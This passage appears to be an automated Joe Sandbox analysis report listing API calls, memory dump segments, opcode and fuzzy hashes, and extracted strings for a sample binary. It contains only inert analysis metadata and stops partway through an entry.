                                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 005732A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 9a4042ead87cd73cb28b1c7b5ef3829b5baabcb0b720dcb1e6036c2f2f6c9b66
                                                            • Instruction ID: 33154bff7ffe010905e0745949096423c6c166072cbfcb7333068f035b14a902
                                                            • Opcode Fuzzy Hash: 9a4042ead87cd73cb28b1c7b5ef3829b5baabcb0b720dcb1e6036c2f2f6c9b66
                                                            • Instruction Fuzzy Hash: 18014B3450D2409BC701AF18E845A1ABBE8EF5AB11F058C2CE5C99B362D635DD64EBA2

                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                            control_flow_graph 367 575bb0-575be2 LdrInitializeThunk
                                                            APIs
                                                            • LdrInitializeThunk.NTDLL(005798C0,005C003F,00000002,00000018,?), ref: 00575BDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                            control_flow_graph 368 542f6f-542f87 CoInitializeSecurity
                                                            APIs
                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00542F81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeSecurity
                                                            • String ID:
                                                            • API String ID: 640775948-0
                                                            • Opcode ID: bb583d117ab5b12361873496a5c4ecc3187389df3e47bf4eb30ecd41d7cbe6f5
                                                            • Instruction ID: 57b5e6f01ecd04900168a2e69f6d586a4dc895fd634df54a443a3950665e534e
                                                            • Opcode Fuzzy Hash: bb583d117ab5b12361873496a5c4ecc3187389df3e47bf4eb30ecd41d7cbe6f5
                                                            • Instruction Fuzzy Hash: 52C092303C9300B1F07006187C13F0420041312F21F700310F3287C1D089D17100E62D

                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                            control_flow_graph 396 542f10-542f65 CoInitialize
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00542F5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 5733eac689d169d71b222ef676bb615143eb003ab00c93291af1694120030471
                                                            • Instruction ID: 1531fd817094ccf17372e50674ba2d1714d3ba1e346e6d5a3e2b7ac5c780ff2d
                                                            • Opcode Fuzzy Hash: 5733eac689d169d71b222ef676bb615143eb003ab00c93291af1694120030471
                                                            • Instruction Fuzzy Hash: B5F012A5D117006BD770BA3D9E0B7177DB8A706660F800729ECE55A7C4FA20A82DCBD7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                            • API String ID: 0-655414846
                                                            • Opcode ID: 83e2912d9460aef94703caeb731903daa945b359c8ffb6c4c20ceb7a9eec1651
                                                            • Instruction ID: 913db41d66221b3d92f137f0f2d1c74a69370576115e113c96d7d246b00fc652
                                                            • Opcode Fuzzy Hash: 83e2912d9460aef94703caeb731903daa945b359c8ffb6c4c20ceb7a9eec1651
                                                            • Instruction Fuzzy Hash: ABF14EB0108381ABD310DF15D891A2ABBF4FB96B49F044D1DF9D59B252E338D908DBA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: :$NA_I$m1s3$uvw
                                                            • API String ID: 0-3973114637
                                                            • Opcode ID: 565ae35fed758c8e2ff56dbc9d162533c92602b1b20f70f7a28a701c956928ba
                                                            • Instruction ID: ac7a7e569b24f5891a46cdbd9ad2d232d22b104065599178bfa284175d17d2cb
                                                            • Opcode Fuzzy Hash: 565ae35fed758c8e2ff56dbc9d162533c92602b1b20f70f7a28a701c956928ba
                                                            • Instruction Fuzzy Hash: FB32CAB0508381DFD314DF28D884A2BBBE5BB9A350F145E2CF9D59B292D335D909CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*+($;z$p$ss
                                                            • API String ID: 0-2391135358
                                                            • Opcode ID: 5572690571dbfb7a0723356eebd05b5fc020f2c619d597bdf2d773e8bb95cd9b
                                                            • Instruction ID: a0bda657aaca9bdc6195e33f9eeebd4464b91327bf265cb6dbf08a389432906c
                                                            • Opcode Fuzzy Hash: 5572690571dbfb7a0723356eebd05b5fc020f2c619d597bdf2d773e8bb95cd9b
                                                            • Instruction Fuzzy Hash: 85025BB4810B00AFD760DF24D986756BFF5FB05304F50895DE89A9B696E330E819CFA2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*+($%*+($~/i!
                                                            • API String ID: 0-4033100838
                                                            • Opcode ID: 221553b9144940b33cce33bf63126912139cfa68c4df781f022054c3cdde2ea6
                                                            • Instruction ID: 20385d2e0fe721bc21411fd8ee75f8d674a2bce327cc9ba30e89c60bcd1c6c8c
                                                            • Opcode Fuzzy Hash: 221553b9144940b33cce33bf63126912139cfa68c4df781f022054c3cdde2ea6
                                                            • Instruction Fuzzy Hash: 48E1B6B1508340DFE3209F25D881B2EBBF9FB95341F48882DE9C99B251E731D819CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Inf$NaN
                                                            • API String ID: 0-3500518849
                                                            • Opcode ID: 1437ad94c57959436ee70b9d10953ebe7c83a8441ea18a472bcb579522026463
                                                            • Instruction ID: cf107ffdde757d4554984dff13924dfbb5324916f1a1737c52496eb819d54a7b
                                                            • Opcode Fuzzy Hash: 1437ad94c57959436ee70b9d10953ebe7c83a8441ea18a472bcb579522026463
                                                            • Instruction Fuzzy Hash: AAD1E4B2A083119BC704CF29C88061EFBE1FFC8750F158A2DF999973A0E675DD459B82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %1.17g
                                                            • API String ID: 0-1551345525
                                                            • Opcode ID: 7566004504842546b51b66dad00e3dea6f75da09784d245f421294afa8dfe0b1
                                                            • Instruction ID: 99e58dd68ea79dfc2917beb9bd9f63ae1e0c4dd3606065e608e3307b84d95c5c
                                                            • Opcode Fuzzy Hash: 7566004504842546b51b66dad00e3dea6f75da09784d245f421294afa8dfe0b1
                                                            • Instruction Fuzzy Hash: 8E22C3B6A08B428BE7158E18D540326BFA2FFE0344F2DA96DD8998B351F771DC45C781
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*+(
                                                            • API String ID: 0-3233224373
                                                            • Opcode ID: 422a9f5525a9526ff34b05aa64aa92255327e83cd78533c6fc38646b3d0fef06
                                                            • Instruction ID: a1c15be492014187b1082e40cd1cb49df3a6cca54a8e5cc3b41bcbd4f6c7de89
                                                            • Opcode Fuzzy Hash: 422a9f5525a9526ff34b05aa64aa92255327e83cd78533c6fc38646b3d0fef06
                                                            • Instruction Fuzzy Hash: E9F1C1B5A00702CFC724DF24E881A66BBF6FF99318B14892DD49B87691EB30F855DB41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: n
                                                            • API String ID: 0-2013832146
                                                            • Opcode ID: d6ece1583e4f81533b3ea5cf097a4b4bb6a951cc02eca3b50056e506a59c0374
                                                            • Instruction ID: 80b12d88a27ee5bd530285eff645f30f8a3f00963d8c90e223f172b36e4ef43f
                                                            • Opcode Fuzzy Hash: d6ece1583e4f81533b3ea5cf097a4b4bb6a951cc02eca3b50056e506a59c0374
                                                            • Instruction Fuzzy Hash: 1902E4B0915B158FC378CF29C590526BBF2BF85710BA44A2EE6978BF91D732B845CB10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BIT
                                                            • API String ID: 0-3252871453
                                                            • Opcode ID: 4f088db275ae0281147a920004dde3c5d2525048038d26bc22506453e6569a81
                                                            • Instruction ID: 9096df0bd7823c521e1282d7c3f73b72d7043351ef355b6a50fa2316211c2a74
